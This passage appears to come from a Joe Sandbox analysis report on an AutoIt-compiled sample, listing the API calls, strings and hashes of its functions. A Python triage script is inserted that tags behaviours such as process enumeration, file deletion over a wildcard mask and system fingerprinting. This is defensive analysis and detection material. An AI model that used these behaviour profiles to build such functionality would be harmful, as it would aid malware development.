• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 420147892-0
                                                    • Opcode ID: e7ec85af8115f25634b623391584217174c6897dc568d99388a440b3151dc227
                                                    • Instruction ID: 38f26b45d7f9aeebfe0361756652b4d6e7d7d10a6447bd244423fe774e7b89a0
                                                    • Opcode Fuzzy Hash: e7ec85af8115f25634b623391584217174c6897dc568d99388a440b3151dc227
                                                    • Instruction Fuzzy Hash: F631A0711083419FD301EF50DC85AAFBBE8BF95355F40052DFA86C21E1EB74AA89EB52
                                                    APIs
                                                      • Part of subcall function 00F03740: CharUpperBuffW.USER32(?,00FB71DC,00000000,?,00000000,00FB71DC,?,00EF53A5,?,?,?,?), ref: 00F0375D
                                                    • _memmove.LIBCMT ref: 00EFB68A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper_memmove
                                                    • String ID:
                                                    • API String ID: 2819905725-0
                                                    • Opcode ID: 32585744299c66121312964b307ae808df082d44e98628ff961e82249e6d12a7
                                                    • Instruction ID: 87262722dec6a609d148a4ed2854b5caba27f91160f96877d95942493c65bcb5
                                                    • Opcode Fuzzy Hash: 32585744299c66121312964b307ae808df082d44e98628ff961e82249e6d12a7
                                                    • Instruction Fuzzy Hash: 51A29870A08345CFC720DF24C480B6AB7E1BF88314F14995DEA9AAB361D774ED85DB92
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,00F3FC86), ref: 00F5495A
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F5496B
                                                    • FindClose.KERNEL32(00000000), ref: 00F5497B
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FileFind$AttributesCloseFirst
                                                    • String ID:
                                                    • API String ID: 48322524-0
                                                    • Opcode ID: 8dbbde229608c0788b7f0e12e2fec32df15a33912d376517ab1f5caff1c4f5f3
                                                    • Instruction ID: dec245585f933fe6b9b2f4d606e5797bdc9831881a49bda3cd7ef54ad2bea115
                                                    • Opcode Fuzzy Hash: 8dbbde229608c0788b7f0e12e2fec32df15a33912d376517ab1f5caff1c4f5f3
                                                    • Instruction Fuzzy Hash: 67E048318149199757106738EC4E8FA775C9F4637AF500715F935C11D0EB70A98C6796
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d28d0a4d07aa95800ec0866cbf0ee07fe097733267a9c8f0f0f26dc685d4414c
                                                    • Instruction ID: 1c1af068b13383abe283305ae8c929241b4299922509045f9d2e8fb076428bad
                                                    • Opcode Fuzzy Hash: d28d0a4d07aa95800ec0866cbf0ee07fe097733267a9c8f0f0f26dc685d4414c
                                                    • Instruction Fuzzy Hash: 9B22AE74E0020ACFDB24DF54C880BBEB7B0FF49310F159169EA86AB352D774A985DB91
                                                    APIs
                                                    • timeGetTime.WINMM ref: 00EFBF57
                                                      • Part of subcall function 00EF52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EF52E6
                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00F336B5
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessagePeekSleepTimetime
                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                    • API String ID: 1792118007-922114024
                                                    • Opcode ID: 24c5543f7ac7a9602b82a9eb27cfc41129c18487dd318935e9ac0dfff7c72f76
                                                    • Instruction ID: de5cd7774322bddb48d2978a54e79bbc2da5cd6f717b68992da2ab259a39ff3a
                                                    • Opcode Fuzzy Hash: 24c5543f7ac7a9602b82a9eb27cfc41129c18487dd318935e9ac0dfff7c72f76
                                                    • Instruction Fuzzy Hash: F8C2C070608345DFD728DF24C884BAABBE4FF84314F14491DF68A972A1CB75E984EB52

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00EF3444
                                                    • RegisterClassExW.USER32(00000030), ref: 00EF346E
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EF347F
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00EF349C
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EF34AC
                                                    • LoadIconW.USER32(000000A9), ref: 00EF34C2
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EF34D1
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: 5d712fae09120c4cc09ee938b4dec018bab94ec8a2457919e0eda3513cd0e851
                                                    • Instruction ID: a1fcaac82b415ccbadc766610242b14746c38cd66b7a6f5472e4b1bc3cf93d31
                                                    • Opcode Fuzzy Hash: 5d712fae09120c4cc09ee938b4dec018bab94ec8a2457919e0eda3513cd0e851
                                                    • Instruction Fuzzy Hash: E531467184430DAFDB809FA4EC89ADDBBF0FB09310F20425AE580A62A0D7B95545EF51

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00EF3444
                                                    • RegisterClassExW.USER32(00000030), ref: 00EF346E
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EF347F
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00EF349C
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EF34AC
                                                    • LoadIconW.USER32(000000A9), ref: 00EF34C2
                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EF34D1
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                    • API String ID: 2914291525-1005189915
                                                    • Opcode ID: 21b2845fff244e721afd452ce31fa9cb5729fa616a2c5e71060fdb387fd251ed
                                                    • Instruction ID: 8dcd513499c38a449474d96ceb8a4357d883e1602da1502c5a70721bcf80b419
                                                    • Opcode Fuzzy Hash: 21b2845fff244e721afd452ce31fa9cb5729fa616a2c5e71060fdb387fd251ed
                                                    • Instruction Fuzzy Hash: FA21E5B190430DAFDB40AFA4EC89BDDBBF4FB08700F50421AF515A62A0DBB15544EF91
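The function records on this page are flat lists of API calls, and reading them by eye is slow. The following Python script is an added example, not part of the Joe Sandbox report or its tooling: it parses the "APIs" and "Similarity" fields in the format shown above, tags the behaviour an API set implies (the CreateToolhelp32Snapshot/Process32FirstW/Process32NextW loop at 00F5416D, the FindFirstFileW/DeleteFileW/FindNextFileW walk over a `\*.*` mask at 00F5407C, the GetVersionExW/IsWow64Process/GetNativeSystemInfo fingerprinting at 00F05D40), and reports records that share an API String ID while carrying different Opcode IDs, as the two "AutoIt v3 GUI" records above (2914291525-1005189915) do. The embedded sample is a constructed excerpt of four records copied from this page and trimmed to the fields the parser uses; the rule labels are mine, and treating `$` as the separator between String ID entries is an assumption inferred from records such as `+$0$AutoIt v3 GUI$TaskbarCreated`.

```python
"""Triage helper for Joe Sandbox function records: parses the 'APIs' and
'Similarity' fields, tags implied behaviours, and finds records that share an
API String ID but differ in Opcode ID.  Added example, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field

# One API line: '• Name.MODULE(args), ref: ADDR'; '(args)' and the subcall prefix are optional.
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<subfn>[0-9A-F]{8}):\s+)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})$")
FIELD_RE = re.compile(r"^•\s+(API String ID|Opcode ID|String ID):\s*(.*)$")

@dataclass
class Record:
    apis: list = field(default_factory=list)     # (name, module, args, ref, subcall_of or None)
    strings: list = field(default_factory=list)  # String ID entries; '$' as separator is an assumption
    api_string_id: str = ""
    opcode_id: str = ""

    def names(self, include_subcalls=True):
        return {a[0] for a in self.apis if include_subcalls or a[4] is None}

def parse(text):
    records, cur = [], Record()
    for raw in text.splitlines():
        line = raw.strip()
        if (m := API_RE.match(line)):
            cur.apis.append((m["name"], m["module"], m["args"] or "", m["ref"], m["subfn"]))
        elif (m := FIELD_RE.match(line)):
            key, val = m.groups()
            if key == "String ID":
                cur.strings = [s for s in val.split("$") if s]
            elif key == "API String ID":
                cur.api_string_id = val
            else:
                cur.opcode_id = val
        elif "Instruction Fuzzy Hash:" in line:  # last field of a record
            records.append(cur)
            cur = Record()
    return records

# Behaviour rules (labels are mine): every API in the set must appear in the record.
RULES = [
    ("process enumeration via Toolhelp32", {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"}),
    ("directory walk with file deletion", {"FindFirstFileW", "FindNextFileW", "DeleteFileW"}),
    ("OS version / WOW64 fingerprinting", {"GetVersionExW", "IsWow64Process", "GetNativeSystemInfo"}),
]

def tag(record):
    names = record.names()  # subcall APIs count: they run whenever this function runs
    tags = [label for label, needed in RULES if needed <= names]
    if "directory walk with file deletion" in tags and any(s.endswith("*.*") for s in record.strings):
        tags.append("wildcard *.* mask: every file in the directory is a deletion candidate")
    return tags

def duplicate_api_profiles(records):
    """API String ID -> set of Opcode IDs, kept only where more than one body shares the ID."""
    by_id = {}
    for r in records:
        if r.api_string_id:
            by_id.setdefault(r.api_string_id, set()).add(r.opcode_id)
    return {k: v for k, v in by_id.items() if len(v) > 1}

# Constructed input: four records copied from this report, trimmed to the fields parsed here.
SAMPLE = r"""
• CreateToolhelp32Snapshot.KERNEL32 ref: 00F5416D
• Process32FirstW.KERNEL32(00000000,?), ref: 00F5417B
• Process32NextW.KERNEL32(00000000,?), ref: 00F5419B
• API String ID: 420147892-0
• Opcode ID: e7ec85af8115f25634b623391584217174c6897dc568d99388a440b3151dc227
• Instruction Fuzzy Hash: F631A0711083419FD301EF50DC85AAFBBE8BF95355F40052DFA86C21E1EB74AA89EB52
  • Part of subcall function 00F10284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F02A58,?,00008000), ref: 00F102A4
• FindFirstFileW.KERNEL32(?,?), ref: 00F5407C
• DeleteFileW.KERNEL32(?,?,?,?), ref: 00F540CC
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 00F540DD
• String ID: \*.*
• API String ID: 2649000838-1173974218
• Opcode ID: 0ee53e6701dedbc2cd77d5273c90aa15d7b7a18bd147ca3930fbe76f901fda9b
• Instruction Fuzzy Hash: 96317E31008385ABC301EB60CC959EFB7E8BE95315F444A1DF9E5821D2DB64EA4DF7A2
• RegisterClassExW.USER32(00000030), ref: 00EF346E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EF347F
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 5d712fae09120c4cc09ee938b4dec018bab94ec8a2457919e0eda3513cd0e851
• Instruction Fuzzy Hash: E331467184430DAFDB809FA4EC89ADDBBF0FB09310F20425AE580A62A0D7B95545EF51
• RegisterClassExW.USER32(00000030), ref: 00EF346E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EF347F
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 21b2845fff244e721afd452ce31fa9cb5729fa616a2c5e71060fdb387fd251ed
• Instruction Fuzzy Hash: FA21E5B190430DAFDB40AFA4EC89BDDBBF4FB08700F50421AF515A62A0DBB15544EF91
"""

if __name__ == "__main__":
    for r in parse(SAMPLE):
        print(r.opcode_id[:12], sorted(r.names(include_subcalls=False)), tag(r))
    print(duplicate_api_profiles(parse(SAMPLE)))
```

Running it prints, per record, the Opcode ID prefix, the APIs the function calls directly, and the tags that fired; a record with no tags is unclassified, not benign, since only the three rule sets above are checked. Subcall APIs are deliberately counted when tagging, because the report marks them as reached from this function; `names(include_subcalls=False)` gives the direct calls when you want to match on the function body alone. The duplicate-profile check surfaces pairs like the two "AutoIt v3 GUI" records, which are worth diffing rather than assuming one is a copy of the other.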

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00F100CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00F03094), ref: 00F100ED
                                                      • Part of subcall function 00F108C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00F0309F), ref: 00F108E3
                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F030E2
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F401BA
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F401FB
                                                    • RegCloseKey.ADVAPI32(?), ref: 00F40239
                                                    • _wcscat.LIBCMT ref: 00F40292
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
• Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                    • API String ID: 2673923337-2727554177
                                                    • Opcode ID: 9fcd86cd92d912508312cf4c8be5f76887bfb3757398062cc30254216e4b9774
                                                    • Instruction ID: e34f8c91687ded1d495f806e77ae3790a5954699d03a1e8d13ba98aaa0410678
                                                    • Opcode Fuzzy Hash: 9fcd86cd92d912508312cf4c8be5f76887bfb3757398062cc30254216e4b9774
                                                    • Instruction Fuzzy Hash: 447148715093059EC714EF65EC859ABBBACFF88390B40062EF545822A1EF70994AEF52

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00F05156
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00F05165
                                                    • LoadIconW.USER32(00000063), ref: 00F0517C
                                                    • LoadIconW.USER32(000000A4), ref: 00F0518E
                                                    • LoadIconW.USER32(000000A2), ref: 00F051A0
                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F051C6
                                                    • RegisterClassExW.USER32(?), ref: 00F0521C
                                                      • Part of subcall function 00EF3411: GetSysColorBrush.USER32(0000000F), ref: 00EF3444
                                                      • Part of subcall function 00EF3411: RegisterClassExW.USER32(00000030), ref: 00EF346E
                                                      • Part of subcall function 00EF3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00EF347F
                                                      • Part of subcall function 00EF3411: InitCommonControlsEx.COMCTL32(?), ref: 00EF349C
                                                      • Part of subcall function 00EF3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00EF34AC
                                                      • Part of subcall function 00EF3411: LoadIconW.USER32(000000A9), ref: 00EF34C2
                                                      • Part of subcall function 00EF3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00EF34D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                    • String ID: #$0$AutoIt v3
                                                    • API String ID: 423443420-4155596026
                                                    • Opcode ID: 1aedb550e6a512cd77abfe58d47f91f70efb11bcc8b39d8f0c81807d6ade43b2
                                                    • Instruction ID: 0f199b0ec45ad6fbc6fbb966b652be1e3e666892da6af431bb02687cbfef02c2
                                                    • Opcode Fuzzy Hash: 1aedb550e6a512cd77abfe58d47f91f70efb11bcc8b39d8f0c81807d6ade43b2
                                                    • Instruction Fuzzy Hash: A6214B71D0430DAFEB11AFA4ED89B9D7BB4FB48710F000259F604A62A0D7B65954EF84

                                                    Control-flow Graph

                                                    control_flow_graph 712 f65e1d-f65e54 call ef4dc0 715 f65e56-f65e63 call ef502b 712->715 716 f65e74-f65e86 WSAStartup 712->716 715->716 724 f65e65-f65e70 call ef502b 715->724 718 f65e9d-f65edb call f040cd call ef4d37 call f0402a inet_addr gethostbyname 716->718 719 f65e88-f65e98 call f47135 716->719 733 f65eec-f65efc call f47135 718->733 734 f65edd-f65eea IcmpCreateFile 718->734 728 f65ff6-f65ffe 719->728 724->716 739 f65fed-f65ff1 call f01cb6 733->739 734->733 735 f65f01-f65f32 call f10fe6 call f0433f 734->735 744 f65f34-f65f53 IcmpSendEcho 735->744 745 f65f55-f65f69 IcmpSendEcho 735->745 739->728 746 f65f6d-f65f6f 744->746 745->746 747 f65fa2-f65fa4 746->747 748 f65f71-f65f76 746->748 751 f65fa6-f65fb2 call f47135 747->751 749 f65fba-f65fcc call ef4dc0 748->749 750 f65f78-f65f7d 748->750 759 f65fd2 749->759 760 f65fce-f65fd0 749->760 752 f65fb4-f65fb8 750->752 753 f65f7f-f65f84 750->753 763 f65fd4-f65fe8 IcmpCloseHandle WSACleanup call f045ae 751->763 752->751 753->747 757 f65f86-f65f8b 753->757 761 f65f8d-f65f92 757->761 762 f65f9a-f65fa0 757->762 759->763 760->763 761->752 765 f65f94-f65f98 761->765 762->751 763->739 765->751
                                                    APIs
                                                    • WSAStartup.WS2_32(00000101,?), ref: 00F65E7E
                                                    • inet_addr.WSOCK32(?,?,?), ref: 00F65EC3
                                                    • gethostbyname.WS2_32(?), ref: 00F65ECF
                                                    • IcmpCreateFile.IPHLPAPI ref: 00F65EDD
                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F65F4D
                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F65F63
                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F65FD8
                                                    • WSACleanup.WSOCK32 ref: 00F65FDE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                    • String ID: Ping
                                                    • API String ID: 1028309954-2246546115
                                                    • Opcode ID: aa065a74b5e7cbd5026cff165bbb7674445aa2840130057f81e650da6aeeb725
                                                    • Instruction ID: 5f6151ba8d6f13d15eadcf08d6a891449a47a868d28e69ff117b84f8790c9c48
                                                    • Opcode Fuzzy Hash: aa065a74b5e7cbd5026cff165bbb7674445aa2840130057f81e650da6aeeb725
                                                    • Instruction Fuzzy Hash: EB5150716046019FD720EF24CD49B6AB7E4EF48B20F144529FA96EB2E1DB74E904EB42

                                                    Control-flow Graph

                                                    control_flow_graph 766 f04d83-f04dd1 768 f04e31-f04e33 766->768 769 f04dd3-f04dd6 766->769 768->769 770 f04e35 768->770 771 f04e37 769->771 772 f04dd8-f04ddf 769->772 773 f04e1a-f04e22 DefWindowProcW 770->773 774 f409c2-f409f0 call efc460 call efc483 771->774 775 f04e3d-f04e40 771->775 776 f04de5-f04dea 772->776 777 f04ead-f04eb5 PostQuitMessage 772->777 778 f04e28-f04e2e 773->778 809 f409f5-f409fc 774->809 780 f04e42-f04e43 775->780 781 f04e65-f04e8c SetTimer RegisterWindowMessageW 775->781 782 f04df0-f04df2 776->782 783 f40a35-f40a49 call f52cce 776->783 779 f04e61-f04e63 777->779 779->778 785 f40965-f40968 780->785 786 f04e49-f04e5c KillTimer call f05ac3 call ef34e4 780->786 781->779 787 f04e8e-f04e99 CreatePopupMenu 781->787 788 f04eb7-f04ec1 call f05b29 782->788 789 f04df8-f04dfd 782->789 783->779 800 f40a4f 783->800 794 f4099e-f409bd MoveWindow 785->794 795 f4096a-f4096c 785->795 786->779 787->779 802 f04ec6 788->802 797 f04e03-f04e08 789->797 798 f40a1a-f40a21 789->798 794->779 803 f4098d-f40999 SetFocus 795->803 804 f4096e-f40971 795->804 807 f04e9b-f04eab call f05bd7 797->807 808 f04e0e-f04e14 797->808 798->773 806 f40a27-f40a30 call f48854 798->806 800->773 802->779 803->779 804->808 810 f40977-f40988 call efc460 804->810 806->773 807->779 808->773 808->809 809->773 815 f40a02-f40a15 call f05ac3 call f059d3 809->815 810->779 815->773
                                                    APIs
                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00F04E22
                                                    • KillTimer.USER32(?,00000001), ref: 00F04E4C
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F04E6F
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F04E7A
                                                    • CreatePopupMenu.USER32 ref: 00F04E8E
                                                    • PostQuitMessage.USER32(00000000), ref: 00F04EAF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                    • String ID: TaskbarCreated
                                                    • API String ID: 129472671-2362178303
                                                    • Opcode ID: 63fe0e3acd327960d1ba0cf3ee1054aff0292673ac87dbe7c6eed491fe389ad0
                                                    • Instruction ID: 685716023266ccc4fb91e162828dbd055932084aa08a0aa7ae2400c330120c4a
                                                    • Opcode Fuzzy Hash: 63fe0e3acd327960d1ba0cf3ee1054aff0292673ac87dbe7c6eed491fe389ad0
                                                    • Instruction Fuzzy Hash: 3441F5B260820EABDB556F24DC49BBE7A95FB80311F140625FB01922E2DE75BC50BF61

                                                    Control-flow Graph

                                                    APIs
                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00F40C5B
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                    • _memset.LIBCMT ref: 00F05787
                                                    • _wcscpy.LIBCMT ref: 00F057DB
                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F057EB
                                                    • __swprintf.LIBCMT ref: 00F40CD1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
